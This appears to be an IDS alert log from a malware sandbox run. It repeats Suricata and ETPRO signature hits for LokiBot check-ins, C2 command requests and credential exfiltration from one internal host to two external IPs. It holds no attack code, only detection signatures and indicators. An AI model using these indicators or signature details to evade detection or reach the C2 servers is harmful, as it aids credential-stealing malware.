                  Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49756 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49825 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49797 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.5:49704 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49825 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49853 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49828 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49808 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49925 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49774 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49919 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49919 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49919 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49808 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49808 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49774 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49847 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49774 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49847 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49889 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49853 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49889 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49919 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49919 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49853 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49828 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49834 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49834 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49964 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49964 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49853 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49853 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49870 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49750 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49925 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49870 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49750 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49803 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49976 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49779 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49779 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49964 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49889 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49797 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49841 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49803 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49716 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49934 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49716 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49934 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49934 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49744 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49744 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49744 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49982 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49982 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49982 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49875 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49955 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49875 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49925 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49875 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49797 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49940 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49925 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49925 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49875 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49955 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49744 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49964 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49744 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49964 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49940 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49889 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49779 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49940 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49889 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49841 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49934 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49841 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49803 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49934 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49859 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49859 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49803 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49859 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49803 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49970 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49970 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49970 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49970 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49982 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49970 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49982 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49785 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49779 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49785 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49779 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49859 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49930 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49859 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49930 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49930 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49955 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49841 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49955 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49930 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49955 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49930 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50026 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49913 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49875 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49940 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49959 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49940 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49959 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50008 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50008 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49841 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49819 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49819 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49819 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49913 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49913 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50026 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50026 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49913 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49913 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49750 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50008 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49750 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49976 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49993 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50008 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49959 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49819 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49819 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50014 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49976 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49750 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49993 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49976 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49976 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50014 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50014 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49993 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49993 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50008 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49959 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49959 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49988 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49998 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49998 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49993 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49998 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50014 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50014 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49998 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49998 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49950 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49950 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49950 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49901 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49901 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49901 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49907 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49950 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49901 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50026 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49901 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49988 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49988 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49944 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49944 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49944 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49988 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49988 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49944 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49944 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49907 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49907 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50026 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49907 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49895 -> 92.113.16.67:80
